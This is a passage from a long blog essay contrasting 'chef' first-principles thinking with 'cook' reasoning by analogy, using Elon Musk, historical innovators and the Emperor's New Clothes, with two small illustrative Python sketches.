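                      lambda hypothesis: next(corrections)))
```

The point of the sketch is the structure: the cook’s function never generates an answer, it only retrieves one from somewhere else, while the chef’s function builds an answer and then keeps revising it as feedback comes in.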
Musk calls the cook’s way of thinking “reasoning by analogy” (as opposed to reasoning by first principles), which is a nice euphemism. The next time a kid gets caught copying answers from another student’s exam during the test, he should just explain that he was reasoning by analogy.
If you start looking for it, you’ll see the chef/cook thing happening everywhere. There are chefs and cooks in the worlds of music, art, technology, architecture,6 writing, business, comedy, marketing, app development, football coaching, teaching, and military strategy. Sometimes the chef is the one brave enough to go for something big—other times, the chef is the one with the strength of character to step out of the game and revert back to the small. And in each case, though both parties are usually just on autopilot, mindlessly playing the latest album again and again at concerts, it’s in those key moments when it’s time to write a new album—those moments of truth in front of a clean canvas, a blank Word doc, an empty playbook, a new sheet of blueprint paper, a fresh whiteboard—that the chef and the cook reveal their true colors. The chef creates, while the cook, in some form or another, copies.
[Image: Line of cooks]
And the difference in outcome is enormous. For cooks, even the more innovative kind, there’s almost always a ceiling on the size of the splash they can make in the world, unless there’s some serious luck involved. Chefs aren’t guaranteed to do anything good, but when there’s a little talent and a lot of persistence, they’re almost certain to make a splash.
No one talks about the “reasoning industry,” but we’re all part of it, and when it comes to chefs and cooks, it’s no different than any other industry. We’re working in the reasoning industry every time we make a decision.
Your current life, with all its facets and complexity, is like a reasoning industry album. The question is, how did that set of songs come to be? How were the songs composed, and by whom? And in those critical do-or-die moments when it’s time to write a new song, how do you do your creating? Do you dig deep into yourself? Do you start with the drumbeat and chords of an existing song and write your own melody on top of it? Do you just play covers?
I know what you want the answers to these questions to be. This is a straightforward one—it’s clearly better to be a chef. But unlike the case with most major distinctions in life—hard-working vs. lazy, ethical vs. dishonest, considerate vs. selfish—when the chef/cook distinction passes right in front of us, we often don’t even notice it’s there.
Missing the Distinction
Like the culinary world’s cook-to-chef range, the real world’s cook-to-chef range isn’t binary—it lies on a spectrum:
[Image: Chef-Cook Life Spectrum]
But I’m pretty sure that when most of us look at that spectrum, we think we’re farther to the right than we actually are. We’re usually more cook-like than we realize—we just can’t see it from where we’re standing.
For example—
Cooks are followers—by definition. They’re a cook because in whatever they’re doing, they’re following some kind of recipe. But most of us don’t think of ourselves as followers.
A follower, we think, is a weakling with no mind of their own. We think about leadership positions we’ve held and initiatives we’ve taken at work and the way we never let friends boss us around, and we take these as evidence that we’re no follower. Which in turn means that we’re not just a cook.
But the problem is—the only thing all of that proves is that you’re no follower within your tribe. As Einstein meanly put it:
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
In other words, you might be a star and a leader in your world or in the eyes of your part of society, but if the core reason you picked that goal in the first place was because your tribe’s cookbook says that it’s an impressive thing and it makes the other tribe members gawk, you’re not being a leader—you’re being a super-successful follower. And, as Einstein says, no less of a cook than all those whom you’ve impressed.
To see the truth, you need to zoom way out until you can see the real leader of the cooks—the cookbook.
But we don’t tend to zoom out, and when we look around at our life, zoomed in, what appears to be a highly unique and independent self may be an optical illusion.7 What often feels like independent reasoning is, once you zoom out, actually playing connect-the-dots on a pre-printed set of steps laid out by someone else. What feel like personal principles might just be the general tenets of your tribe. What feel like original opinions may have actually been spoon-fed to us by the media or our parents or friends or our religion or a celebrity. What feels like Roark might actually be Keating. What feels like our chosen life path could just be one of a handful of pre-set, tribe-approved yellow brick roads. What feels like creativity might be filling in a coloring book—and making sure to stay inside the lines.
Because of this optical illusion, we’re unable to see the flaws in our own thinking or recognize an unusually great thinker when we see one. Instead, when a superbly science-minded, independent-thinking chef like Elon Musk or Steve Jobs or Albert Einstein comes around, what do we attribute their success to?
Awesome fucking hardware.
When we look at Musk, we see someone with genius, with vision, with superhuman balls. All things, we assume, he was more or less born with. So to us, the spectrum looks more like this:
[Image: Chef-Cook Life Spectrum Skewed]
The way we see it, we’re all a bunch of independent-thinking chefs—and it’s just that Musk is a really impressive chef.
Which is both A) overrating Musk and B) overrating ourselves. And completely missing the real story.
Musk is an impressive chef for sure, but what makes him such an extreme standout isn’t that he’s impressive—it’s that most of us aren’t chefs at all.
It’s like a bunch of typewriters looking at a computer and saying, “Man, that is one talented typewriter.”
The reason we have such a hard time seeing what’s really going on is that we don’t get that brain software is even a thing. We don’t think of brains as computers, so we don’t think about the distinction between hardware and software at all. When we think about the brain, we think only about the hardware—the thing we’re born with and are powerless to change or improve. Much less tangible to us is the concept of how we reason. We see reasoning as a thing that just kind of happens, like our bodies’ blood flow—it’s a process that automatically happens, and there’s not much else to say or do about it.
And if we can’t even see the hardware/software distinction, we certainly can’t see the more nuanced chef software vs. cook software distinction.
By not seeing our thinking software for what it is—a critical life skill, something that can be learned, practiced, and improved, and the major factor that separates the people who do great things from those who don’t—we fail to realize where the game of life is really being played. We don’t recognize reasoning as a thing that can be created or copied—and in the same way that causes us to mistake our own cook-like behavior for independent reasoning, we then mistake the actual independent reasoning of the chef for exceptional and magical abilities.
Three examples:
1) We mistake the chef’s clear view of the present for vision into the future.
Musk’s sister Tosca said “Elon has already gone to the future and come back to tell us what he’s found.”7 This is how a lot of people feel about Musk—that he’s a visionary, that he can somehow see things we cannot. We see it like this:
[Image: Musk Visionary 1]
But actually, it’s like this:
[Image: Musk Visionary 2]
Conventional wisdom is slow to move, and there’s significant lag time between when something becomes reality and when conventional wisdom is revised to reflect that reality. And by the time it does, reality has moved on to something else. But chefs don’t pay attention to that, reasoning instead using their eyes and ears and experience. By ignoring conventional wisdom in favor of simply looking at the present for what it really is and staying up-to-date with the facts of the world as they change in real-time—in spite of what conventional wisdom has to say—the chef can act on information the rest of us haven’t been given permission to act on yet.
2) We mistake the chef’s accurate understanding of risk for courage.
Remember this ElonSpeak quote from earlier?
When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.8
That’s just a kid chef assessing the actual facts of a situation and deciding that his fear was misplaced.
As an adult, Musk said this:
Sometimes people fear starting a company too much. Really, what’s the worst that could go wrong? You’re not gonna starve to death, you’re not gonna die of exposure—what’s the worst that could go wrong?
Same quote, right?
In both cases, Musk is essentially saying, “People consider X to be scary, but their fear is not based on logic, so I’m not scared of X.” That’s not courage—that’s logic.
Courage means doing something risky. Risk means exposing yourself to danger. We intuitively understand this—that’s why most of us wouldn’t call child Elon courageous for sleeping with the lights off. Courage would be a weird word to use there because no actual danger was involved.
All Elon’s saying in the second quote is that being scared to start a company is the adult version of being scared of the dark. It’s not actually dangerous.
So when Musk put his entire fortune down on SpaceX and Tesla, it was bold as fuck, but courageous? Not the right word. It was a case of a chef taking a bunch of information he had and puzzling together a plan that seemed logical. It’s not that he was sure he’d succeed—in fact, he thought SpaceX in particular had a reasonable probability of failure—it’s just that nowhere in his assessments did he foresee danger.
3) We mistake the chef’s originality for brilliant ingenuity.
People believe thinking outside the box takes intelligence and creativity, but it’s mostly about independence. When you simply ignore the box and build your reasoning from scratch, whether you’re brilliant or not, you end up with a unique conclusion—one that may or may not fall within the box.
When you’re in a foreign country and you decide to ditch the guidebook and start wandering aimlessly and talking to people, unique things always end up happening. When people hear about those things, they’ll think of you as a pro traveler and a bold adventurer—when all you really did is ditch the guidebook.
Likewise, when an artist or scientist or businessperson chef reasons independently instead of by analogy, and their puzzling happens to both A) turn out well and B) end up outside the box, people call it innovation and marvel at the chef’s ingenuity. When it turns out really well, all the cooks do what they do best—copy—and now it’s called a revolution.
Simply by refraining from reasoning by analogy, the chef opens up the possibility of making a huge splash with every project. When Steve Jobs8 and Apple turned their attention to phones, they didn’t start by saying, “Okay well people seem to like this kind of keyboard more than that kind, and everyone seems unhappy with the difficulty of hitting the numbers on their keyboards—so let’s get creative and make the best phone keyboard yet!” They simply asked, “What should a mobile device be?” and in their from-scratch reasoning, a physical keyboard didn’t end up as part of the plan at all. It didn’t take genius to come up with the design of the iPhone—it’s actually pretty logical—it just took the ability to not copy.
Different version of the same story with the invention of the United States. When the American forefathers found themselves with a new country on their hands, they didn’t ask, “What should the rules be for selecting our king, and what should the limitations of his power be?” A king to them was what a physical keyboard was to Apple. Instead, they asked, “What should a country be and what’s the best way to govern a group of people?” and by the time they had finished their puzzling, a king wasn’t part of the picture—their first principles reasoning led them to believe that John Locke had a better plan and they worked their way up from there.
History is full of the stories of chefs creating revolutions of apparent ingenuity through simple first principles reasoning. Genghis Khan organizing a smattering of tribes that had been fragmented for centuries using a powers-of-ten system in order to build one grand tribe that could sweep the world. Henry Ford creating cars with the out-of-the-box manufacturing technique of assembly-line production in order to bring cars to the masses for the first time. Marie Curie using unconventional methods to pioneer the theory of radioactivity and overturn the “atoms are indivisible” assumption (she won a Nobel Prize in both physics and chemistry—two prizes reserved exclusively for chefs). Martin Luther King taking a nonviolent Thoreau approach to a situation normally addressed by riots. Larry Page and Sergey Brin ignoring the commonly-used methods of searching the internet in favor of what they saw as a more logical system that based page importance on the number of important sites that linked to it. The 1966 Beatles deciding to stop being the world’s best cooks, ditch the typical songwriting styles of early-60s bands, including their own, and become music chefs, creating a bunch of new types of songs from scratch that no one had heard before.
Whatever the time, place, or industry, anytime something really big happens, there’s almost always an experimenting chef at the center of it—not being anything magical, just trusting their brain and working from scratch. Our world, like our cuisines, was created by these people—the rest of us are just along for the ride.
Yeah, Musk is smart as fuck and insanely ambitious—but that’s not why he’s beating us all. What makes Musk so rad is that he’s a software outlier. A chef in a world of cooks. A science geologist in a world of flood geologists. A brain software pro in a world where people don’t realize brain software is a thing.
That’s Elon Musk’s secret sauce.
Which is why the real story here isn’t Musk. It’s us.
The real puzzle in this series isn’t why Elon Musk is trying to end the era of gas cars or why he’s trying to land a rocket or why he cares so much about colonizing Mars—it’s why Elon Musk is so rare.
The curious thing about the car industry isn’t why Tesla is focusing so hard on electric cars, and the curious thing about the aerospace industry isn’t why SpaceX is trying so hard to make rockets reusable—the fascinating question is why they’re the only companies doing so.
We spent this whole time trying to figure out the mysterious workings of the mind of a madman genius only to realize that Musk’s secret sauce is that he’s the only one being normal. And in isolation, Musk would be a pretty boring subject—it’s the backdrop of us that makes him interesting. And it’s that backdrop that this series is really about.
So…what’s the deal with us? How did we end up so scared and cook-like? And how do we learn to be more like the chefs of the world, who seem to so effortlessly carve their own way through life? I think it comes down to three things.
How to Be a Chef
Anytime there’s a curious phenomenon within humanity—some collective insanity we’re all suffering from—it usually ends up being evolution’s fault. This story is no different.
When it comes to reasoning, we’re biologically inclined to be cooks, not chefs, which relates back to our tribal evolutionary past. First, it’s a better tribal model for most people to be cooks. In 50,000 BC, tribes full of independent thinkers probably suffered from having too many chefs in the kitchen, which would lead to too many arguments and factions within the tribe. A tribe with a strong leader at the top and the rest of the members simply following the leader would fare better. So those types of tribes passed on their genes more. And now we’re the collective descendants of the more cook-like people.
Second, it’s about our own well-being. It’s not in our DNA to be chefs because human self-preservation never depended upon independent thinking—it rode on fitting in with the tribe, on staying in favor with the chief, on following in the footsteps of the elders who knew more about staying alive than we did. And on teaching our children to do the same—which is why we now live in a cook society where cook parents raise their kids by telling them to follow the recipe and stop asking questions about it.
Thinking like cooks is what we’re born to do because what we’re born to do is survive.
But the weird thing is, we weren’t born into a normal human world. We’re living in the anomaly, when for many of the world’s people, survival is easy. Today’s privileged societies are full of anomaly humans whose primary purpose is already taken care of, softening the deafening roar of unmet base needs and allowing the nuanced and complex voice of our inner selves to awaken.
The problem is, most of our heads are still running on some version of the 50,000-year-old survival software—which kind of wastes the good luck we have to be born now.
It’s an unfortunate catch-22—we continue to think like cooks because we can’t absorb the epiphany that we live in an anomaly world where there’s no need to be cooks, and we can’t absorb that epiphany because we think like cooks and cooks don’t know how to challenge and update their own software.
This is the vicious cycle of our time—and the secret of the chef is that they somehow snapped out of it.
So how do we snap out of the trance?
I think there are three major epiphanies we need to absorb—three core things the chef knows that the cook doesn’t:
Epiphany 1) You don’t know shit.
The flood geologists of the 17th and 18th centuries weren’t stupid. And they weren’t anti-science. Many of them were just as accomplished in their fields as their science geologist colleagues.
But they were victims—victims of a religious dogma they were told to believe without question. The recipe they followed was scripture, a recipe that turned out to be wrong. And as a result, they proceeded on their path with a fatal flaw in their thinking—a software bug that told them that one of the undeniable first principles when thinking about the Earth was that it began 6,000 years ago and that there had been a flood of the most epic proportions.
With that bug in place, all further computations were moot. Any reasoning tree that puzzled upwards with those assumptions at its root had no chance of finding truth.
Even more than being victims of any dogma, the flood geologists were victims of their own certainty. Without certainty, dogma has no power. And when data is required in order to believe something, false dogma has no legs to stand on. It wasn’t the church dogma that hindered the flood geologists, it was the church mentality of faith-based certainty.
That’s what Stephen Hawking meant when he said, “The greatest enemy of knowledge is not ignorance, it is the illusion of knowledge.” Neither the science geologist nor the flood geologist started off with knowledge. But what gave the science geologist the power to seek out the truth was knowing that he had no knowledge. The science geologists subscribed to the lab mentality, which starts by saying “I don’t know shit” and works upwards from there.
If you want to see the lab mentality at work, just search for famous quotes of any prominent scientist and you’ll see each one of them expressing the fact that they don’t know shit.
Here’s Isaac Newton: To myself I am only a child playing on the beach, while vast oceans of truth lie undiscovered before me.
And Richard Feynman: I was born not knowing and have had only a little time to change that here and there.
And Niels Bohr: Every sentence I utter must be understood not as an affirmation, but as a question.
Musk has said his own version: You should take the approach that you’re wrong. Your goal is to be less wrong.9
The reason these outrageously smart people are so humble about what they know is that as scientists, they’re aware that unjustified certainty is the bane of understanding and the death of effective reasoning. They firmly believe that reasoning of all kinds should take place in a lab, not a church.
If we want to become more chef-like, we have to make sure we’re doing our thinking in a lab. Which means identifying which parts of our thinking are currently sitting in church.
But that’s a hard thing to do because most of us have the same relationship with our own software that my grandmother has with her computer:9 It’s this thing someone put there, we use it when we need to, it somehow magically works, and we hope it doesn’t break. It’s the way we are with a lot of the things we own, where we’re just the dumb user, not the pro. We know how to use our car, microwave, phone, our electric toothbrush, but if something breaks, we take it to the pro to fix it because we have no idea how it works.
But that’s not a great life model when it comes to brain software, and it usually leads to us making the same mistakes and living with the same results year after year after year, because our software remains unchanged. Eventually, we might wake up one day feeling like Breaking Bad’s Walter White, when he said, “Sometimes I feel like I never actually make, any of my own… choices. I mean, my entire life it just seems I never… had a real say about any of it.” If we want to understand our own thinking, we have to stop being the dumb user of our own software and start being the pro—the auto mechanic, the electrician, the computer geek.
If you were alone in a room with a car and wanted to figure out how it worked, you’d probably start by taking it apart as much as you could and examining the parts and how they all fit together. To do the same with our thinking, we need to revert to our four-year-old selves and start deconstructing our software by resuming the Why game our parents and teachers shut down decades ago. It’s time to roll up our sleeves, pop open the hood, and get our hands dirty with a bunch of not-that-fun questions about what we truly want, what’s truly possible, and whether the way we’re living our lives follows logically from those things.
With each of these questions, the challenge is to keep asking why until you hit the floor—and the floor is what will tell you whether you’re in a church or a lab for that particular part of your life. If a floor you hit is one or more first principles that represent the truth of reality or your inner self and the logic going upwards stays accurate to that foundation, you’re in the lab. If a Why? pathway hits a floor called “Because [authority] said so”—if you go down and down and realize at the bottom that the whole thing is just because you’re taking your parent’s or friend’s or religion’s or society’s word for it—then you’re in church there. And if the tenets of that church don’t truly resonate with you or reflect the current reality of the world—if it turns out that you’ve been working off of the wrong recipe—then whatever conclusions have been built on top of it will be just as wrong. As demonstrated by the flood geologists, a reasoning chain is only as strong as its weakest link.
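If it helps to see that drill-down spelled out, here’s a toy version of the Why game written as code. The beliefs, the reasons table, and the “said so” check are all made-up examples; the only point is the shape of the procedure: keep following the whys until you hit a floor, then look at what the floor is made of.

```python
# A toy version of the Why game: follow each belief down to its floor,
# then check whether that floor is a lab or a church.
# The beliefs and reasons below are invented examples.

REASONS = {
    "I should go to law school": "a prestigious career is what matters most",
    "a prestigious career is what matters most": "because my parents said so",
    "I want to spend my days making things": "making things is what I most enjoy",
    "making things is what I most enjoy": "first principle: my own experience",
}

def why_game(belief, reasons, max_depth=10):
    """Keep asking 'why?' until the chain bottoms out, then name the floor."""
    chain = [belief]
    for _ in range(max_depth):
        reason = reasons.get(chain[-1])
        if reason is None:          # hit the floor
            break
        chain.append(reason)
    floor = chain[-1]
    verdict = "church" if "said so" in floor else "lab"
    return chain, verdict

if __name__ == "__main__":
    for belief in ("I should go to law school", "I want to spend my days making things"):
        chain, verdict = why_game(belief, REASONS)
        print("  ->  ".join(chain), f"[{verdict}]")
```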
[Image: False Dogma 1]
Astronomers once hit a similar wall trying to calculate the trajectories of the sun and planets in the Solar System. Then one day they discovered that the sun was at the center of things, not the Earth, and suddenly, all the perplexing calculations made sense, and progress leapt forward. Had they played the Why game earlier, they’d have run into a dogmatic floor right after the question “But why do we think the Earth is at the center of everything?”
People’s lives are no different, which is why it’s so important to find the toxic lumps of false dogma tucked inside the layers of your reasoning software. Identifying one and adjusting it can strengthen the whole chain above and create a breakthrough in your life.
[Image: False Dogma 2]
The thing you really want to look closely for is unjustified certainty. Where in life do you feel so right about something that it doesn’t qualify as a hypothesis or even a theory, but it feels like a proof? When there’s proof-level certainty, it means either there’s some serious concrete and verified data underneath it—or it’s faith-based dogma. Maybe you feel certain that quitting your job would be a disaster or certain that there’s no god or certain that it’s important to go to college or certain that you’ve always had a great time on rugged vacations or certain that everyone loves it when you break out the guitar during a group hangout—but if it’s not well backed-up by data from what you’ve learned and experienced, it’s at best a hypothesis and at worst a completely false piece of dogma.
And if thinking about all of that ends with you drowning in some combination of self-doubt, self-loathing, and identity crisis, that’s perfect. This first epiphany is about humility. Humility is by definition a starting point—and it sends you off on a journey from there. The arrogance of certainty is both a starting point and an ending point—no journeys needed. That’s why it’s so important that we begin with “I don’t know shit.” That’s when we know we’re in the lab.
Epiphany 2) No one else knows shit either.
Let me illustrate a little story for you.
[Comic strip: The Emperor’s New Clothes]
Yes, it’s an old classic. The Emperor’s New Clothes. It was written in 1837 by Hans Christian Andersen10 to demonstrate a piece of trademark human insanity: the “This doesn’t seem right to me but everyone else says it’s right so it must be right and I’ll just pretend I also think it’s right so no one realizes I’m stupid” phenomenon.
My favorite all-time quote might be Steve Jobs saying this:
When you grow up, you tend to get told the world is the way it is and your life is just to live your life inside the world. Try not to bash into the walls too much. Try to have a nice family life, have fun, save a little money. That’s a very limited life. Life can be much broader once you discover one simple fact. And that is: Everything around you that you call life was made up by people that were no smarter than you. And you can change it, you can influence it, you can build your own things that other people can use. Once you learn that, you’ll never be the same again.11
This is Jobs’ way of saying, “You might not know shit. But no one knows shit. If the emperor looks naked to you and everyone else is saying he has clothes, trust your eyes since other people don’t know anything you don’t.”
It’s an easy message to understand, a harder one to believe, and an even harder one to act on.
The purpose of the first epiphany is to shatter the belief that all that dogma you’ve memorized constitutes personal opinions and wisdom and all that certainty you feel constitutes knowledge and understanding. That’s the easier one because the delusion that we know what we’re talking about is pretty fragile, with the “Oh god I’m a fraud who doesn’t know shit” monster never lurking too far under our consciousness.
But this epiphany—that the collective “other people” and their conventional wisdom don’t know shit—is a much larger challenge. Our delusion about the wisdom of those around us, our tribe, and society as a whole is much thicker and runs much deeper than the delusion about ourselves. So deep that we’ll see a naked emperor and ignore our own eyes if everyone else says he has clothes on.
This is a battle of two kinds of confidence—confidence in others vs. confidence in ourselves. For most cooks, confidence in others usually comes out the winner.
To swing the balance, we need to figure out how to lose respect for the general public, our own tribe’s dogma, and society’s conventional wisdom. We have a bunch of romantic words for the world’s chefs that sound impressive but are actually just a result of them having lost this respect. Being a gamechanger is just having little enough respect for the game that you realize there’s no good reason not to change the rules. Being a trailblazer is just not respecting the beaten path and so deciding to blaze yourself a new one. Being a groundbreaker is just knowing that the ground wasn’t laid by anyone that impressive and so feeling no need to keep it intact.
Not respecting society is totally counterintuitive to what we’re taught when we grow up—but it makes perfect sense if you just look at what your eyes and experience tell you.
There are clues all around showing us that conventional wisdom doesn’t know shit. Conventional wisdom worships the status quo and always assumes that everything is the way it is for a good reason—and history is one long record of status quo dogma being proven wrong again and again, every time some chef comes around and changes things.
And if you open your eyes, there are other clues all through your own life that the society you live in is nothing to be intimidated by. All the times you learn about what really goes on inside a company and find out that it’s totally disorganized and badly run. All the people in high places who can’t seem to get their personal lives together. All the well-known sitcoms whose jokes you’re pretty sure you could have written when you were 14. All the politicians who don’t seem to know more about the world than you.
And yet, the delusion that society knows shit that you don’t runs deep, and still, somewhere in the back of your head, you don’t think it’s realistic that you could ever actually build that company, achieve that fabulous wealth or celebrity status, create that TV show, win that Senate campaign—no matter what it seems like.
Sometimes it takes an actual experience to fully expose society for the shit it doesn’t know. One example from my life is how I slowly came to understand that most Americans—the broader public, my tribe, and people I know well—knew very little about what it’s actually like to visit most countries. I grew up hearing about how dangerous it was to visit really foreign places, especially alone. But when I started going places I wasn’t supposed to go, I kept finding that the conventional wisdom had been plain wrong about it. As I had more experiences and gathered more actual data, I grew increasingly trusting of my own reasoning over whatever Americans were saying. And as my confidence grew, places like Thailand and Spain turned into places like Oman and Uzbekistan which turned into places like Nigeria and North Korea. When it comes to traveling, I had the epiphany: other people’s strong opinions about this are based on unbacked-up dogma and the fact that most people I talk to feel the same way means nothing if my own research, experience, and selective question-asking brings me to a different conclusion.12 When it comes to picking travel destinations, I’ve become a chef.
I try to leverage what I learned as a traveler to transfer the chefness elsewhere—when I find myself discouraged in another part of my life by the warnings and head-shaking of conventional wisdom, I try to remind myself: “These are the same people that were sure that North Korea was dangerous.” It’s hard—you have to take the leap to chefdom separately in each part of your life—but it seems like with each successive cook → chef breakthrough, future breakthroughs become easier to come by. Eventually, you must hit a tipping point and trusting your own software becomes your way of life—and as Jobs says, you’ll never be the same again.
The first epiphany was about shattering a protective shell of arrogance to lay bare a starting point of humility. This second epiphany is about confidence—the confidence to emerge from that humility through a pathway built on first principles instead of by analogy. It’s a confidence that says, “I may not know much, but no one else does either, so I might as well be the most knowledgeable person on Earth.”
Epiphany 3) You’re playing Grand Theft Life
The first two epiphanies allow us to break open our software, identify which parts of it were put there by someone else, and with confidence begin to fill in the Want and Reality boxes with our own handwriting and choose a goal and a strategy that’s right for us.
But then we hit a snag. We’re finally in the lab with all our tools and equipment, but something holds us back. To figure out why, let’s bring back our emperor story.
When the emperor struts out with his shoulder hair and his gut and his little white junk, the story only identifies two kinds of people: the mass of subjects, who all pretend they can see the clothes, and the kid, who just says that the dude is obviously naked.
But I think there’s more going on. In an emperor’s new clothes situation, there are four kinds of people:
1) Proud Cook. Proud Cook is the person drinking the full dogma Kool-Aid. Whatever independent-thinking voice is inside of Proud Cook was silenced long ago, and there’s no distinction between his thoughts and the dogma he follows. As far as he’s concerned, the dogma is truth—but since he doesn’t even register that there’s any dogma happening, Proud Cook simply thinks he’s a very wise person who has it all figured out. He feels the certainty of the dogma running through his veins. When the emperor walks out and proclaims that he is wearing beautiful new clothes, Proud Cook actually sees clothes, because his consciousness isn’t even turned on.
2) Insecure Cook. Insecure Cook is what Proud Cook turns into after undergoing Epiphany #1. Insecure Cook has had a splash of self-awareness—enough to become conscious of the fact that he doesn’t actually know why he’s so certain about the things he’s certain about. Whatever the reasons are, he’s sure they’re right, but he can’t seem to come up with them himself. Without the blissful arrogance of Proud Cook, Insecure Cook is lost in the world, wondering why he’s too dumb to get what everyone else gets and trying to watch others to figure out what he’s supposed to do—all while hoping nobody finds out that he doesn’t get it. When Insecure Cook sees the emperor, his heart sinks—he doesn’t see the clothes, only the straggly gray hairs of the emperor’s upper thighs. Ashamed, he reads the crowd and mimics their enthusiasm for the clothes.
3) Self-Loathing Cook. Self-Loathing Cook is what Insecure Cook becomes after being hit by Epiphany #2. Epiphany #2 is the forbidden fruit, and Self-Loathing Cook has bitten it. He now knows exactly why he didn’t feel certain about everything—because it was all bullshit. He sees the tenets of conventional wisdom for what they really are—faith-based dogma. He knows that neither he nor anyone else knows shit and that he’ll get much farther riding his own reasoning than jumping on the bandwagon with the masses. When the emperor emerges, Self-Loathing Cook thinks, “Oh Jesus…this fucktard is actually outside with no clothes on. Oh—oh and my god these idiots are all pretending to see clothes. How is this my life? I need to move.”
But then, right when he’s about to call everyone out on their pretending and the emperor out on his bizarre life decision, there’s a lump in his throat. Sure, he knows there are no clothes on that emperor’s sweaty lower back fat roll—but actually saying that? Out loud? I mean, he’s sure and all—but let’s not go crazy here. Better not to call too much attention to himself. And of course, there’s a chance he’s missing something. Right?
Self-Loathing Cook ends up staying quiet and nodding at the other cooks when they ask him if those clothes aren’t just the most marvelous he’s ever seen.
4) The chef. The kid in the story. The chef is Self-Loathing Cook—except without the irrational fear. The chef goes through the same inner thought process as Self-Loathing Cook, but when it’s time to walk the walk, the chef stands up and yells out the truth.
A visual recap:
[Image: 4 Subjects]
We’re all human and we’re all complex, which means that in various parts of each of our lives, we play each of these four characters.
But to me, Self-Loathing Cook is the most curious one of the four. Self-Loathing Cook gets it. He knows what the chefs know. He’s tantalizingly close to carving out his own chef path in the world, and he knows that if he just goes for it, good things will happen. But he can’t pull the trigger. He built himself a pair of wings he feels confident work just fine, but he can’t bring himself to jump off the cliff.
And as he stands there next to the cliff with the other cooks, he has to endure the torture of watching the chefs of the world leap off the edge with the same exact wings and flying skills he has, but with the courage he can’t seem to find.
To figure out what’s going on with Self-Loathing Cook, let’s remind ourselves how the chefs operate.
Free of Self-Loathing Cook’s trepidation, the world’s chefs are liberated to put on their lab coats and start sciencing. To a chef, the world is one giant laboratory, and their life is one long lab session full of a million experiments. They spend their days puzzling, and society is their game board.
The chef treats his goals and undertakings as experiments whose purpose is as much to learn new information as it is to be ends in themselves. That’s why when I asked Musk what his thoughts were on negative feedback, he answered with this:
I’m a huge believer in taking feedback. I’m trying to create a mental model that’s accurate, and if I have a wrong view on something, or if there’s a nuanced improvement that can be made, I’ll say, “I used to think this one thing that turned out to be wrong—now thank goodness I don’t have that wrong belief.”
To a chef in the lab, negative feedback is a free boost forward in progress, courtesy of someone else. Pure upside.
As for the F word…the word that makes our amygdalae quiver in the moonlight, the great chefs have something to say about that too:
Failure is simply the opportunity to begin again, this time more intelligently. —Henry Ford
Success is going from failure to failure without losing your enthusiasm. —Winston Churchill10
I have not failed 700 times. I’ve succeeded in proving 700 ways how not to build a lightbulb. —Thomas Edison
There’s no more reliable pattern than super-successful people thinking failure is fucking awesome.
But there’s something to that. The science approach is all about learning through testing hypotheses, and hypotheses are built to be disproven, which means that scientists learn through failure. Failure is a critical part of their process.
It makes sense. If there were two scientists trying to come up with a breakthrough in cancer treatment, and the first one is trying every bold thing he can imagine, failing left and right and learning something each time, while the second one is determined not to have any failures and so makes sure his experiments stay similar to others that have already been proven to work—which scientist would you bet on?
It’s not surprising that so many of the most wildly impactful people seem to treat the world like a lab and their life like an experiment session—that’s the best way to succeed at something.
But for most of us, we just can’t do it. Even poor Self-Loathing Cook, who is so damn close to being a chef—but somehow so far away.
So what’s stopping him? I think two major misconceptions:
Misconception 1: Misplaced Fear
We talked about the chef’s courage actually just being an accurate assessment of risk—and that’s one of the major things Self-Loathing Cook is missing. He thinks he has become wise to the farce of letting dogma dictate your life, but he’s actually in the grasp of dogma’s slickest trick.
Humans are programmed to take potential fears very seriously, and evolution didn’t find it efficient to have us assess and re-assess every fear inside of us. It went instead with the “better safe than sorry” philosophy—i.e. if there’s a chance that a certain fear might be based on real danger, file it away as a real fear, just in case, and even if you confirm later that a fear of yours has no basis, keep it with you, just in case. Better safe than sorry.
And the fear file cabinet is somewhere way down in our psyches—somewhere far below our centers of rationality, out of reach.
The purpose of all of that fear is to make us protect ourselves from danger. The problem for us is that as far as evolution is concerned, danger = something that hurts the chance that your genes will move on—i.e., danger = not mating or dying or your kids dying, and that’s about it.
So in the same way our cook-like qualities were custom-built for survival in tribal times, our obsession with fears of all shapes and sizes may have served us well in Ethiopia 50,000 years ago—but it mostly ruins our lives today.
Because not only does it amp up our fear in general to “shit we botched the hunt now the babies are all going to starve to death this winter” levels even though we live in an “oh no I got laid off now I have to sleep at my parents’ house for two months with a feather pillow in ideal 68° temperature” world—but it also programs us to be terrified of all the wrong things. We’re more afraid of public speaking than texting on the highway, more afraid of approaching an attractive stranger in a bar than marrying the wrong person, more afraid of not being able to afford the same lifestyle as our friends than spending 50 years in a meaningless career—all because embarrassment, rejection, and not fitting in really sucked for hunters and gatherers.
This leaves most of us with a skewed danger scale:
[Danger Scale diagram]
Chefs hate real risk just as much as cooks—a chef who ends up in the Actually Dangerous territory and ends up in jail or in a gutter or in dire financial straits isn’t a chef—he’s a cook living under “I’m invincible” dogma. When we see chefs displaying what looks like incredible courage, they’re usually just in the Chef Lab. The Chef Lab is where all the action is and where the path to many people’s dreams lies—dreams about their career, about love, about adventure. But even though its doors are always open, most people never set foot in it for the same reason so many Americans never visit some of the world’s most interesting countries—because of an incorrect assumption that it’s a dangerous place. By reasoning by analogy when it comes to what constitutes danger and ending up with a misconception, Self-Loathing Cook is missing out on all the fun.
Misconception 2: Misplaced Identity
The second major problem for Self-Loathing Cook is that, like all cooks, he can’t wrap his head around the fact that he’s the scientist in the lab—not the experiment.
As we established earlier, conscious tribe members reach conclusions, while blind tribe members are conclusions. And what you believe, what you stand for, and what you choose to do each day are conclusions that you’ve drawn. In some cases, very, very publicly.
As far as society is concerned, when you give something a try—on the values front, the fashion front, the religious front, the career front—you’ve branded yourself. And since people like to simplify people in order to make sense of things in their own head, the tribe around you reinforces your brand by putting you in a clearly-labeled, oversimplified box.
What this all amounts to is that it becomes very painful to change. Changing is icky for someone whose identity will have to change along with it. And others don’t make things any easier. Blind tribe members don’t like when other tribe members change—it confuses them, it forces them to readjust the info in their heads, and it threatens the simplicity of their tribal certainty. So attempts to evolve are often met with mockery or anger or opposition.
And when you have a hard time changing, you become attached to who you currently are and what you’re currently doing—so attached that it blurs the distinction between the scientist and the experiment and you forget that they’re two different things.
